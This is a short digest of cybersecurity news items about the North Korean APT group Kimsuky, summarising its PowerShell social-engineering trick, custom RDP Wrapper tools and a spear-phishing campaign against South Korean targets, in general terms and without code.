2025-02-22 21:15:47 Pacfic
North Korean Hackers Exploit PowerShell Trick - 10d
The North Korea-linked APT group Kimsuky, also known as Emerald Sleet, is using a new tactic to compromise its traditional espionage targets. The group is tricking targets into running PowerShell as an administrator and executing malicious code. They build rapport with targets before sending a spear-phishing email with an attached PDF. The registration link has instructions to open PowerShell as an administrator and paste code provided by Emerald Sleet. If the target runs the code as an administrator, the code downloads and installs a browser-based remote desktop tool. This allows the threat actor to access the device and carry out data exfiltration.
Kimsuky APT Group Uses Custom RDP Wrapper - 12d
The Kimsuky hacking group is using a custom-built RDP Wrapper and proxy tools to gain access to infected machines. This allows them to bypass security measures and maintain persistent access.
Kimsuky Targets South Korea with PowerShell and Dropbox - 8d
Kimsuky, a North Korean state-sponsored hacking group, conducted a targeted attack campaign (“DEEP#DRIVE”) against South Korean entities in the business, government, and cryptocurrency sectors. The campaign involved spear-phishing emails with malicious PDF documents and PowerShell code execution. This highlights the persistent threat from state-sponsored actors targeting specific sectors.
Kimsuky Hackers Employ Custom RDP Wrapper for Access - 13d
The Kimsuky APT group is actively employing a custom-built RDP Wrapper and proxy tools to gain unauthorized access to infected machines, enabling persistent cyber espionage. This involves spear-phishing tactics and the distribution of malicious shortcut files disguised as legitimate documents. AhnLab’s ASEC team has released a blog post detailing additional malware used in these attacks. This highlights the group’s evolving tactics and persistent threat to organizations.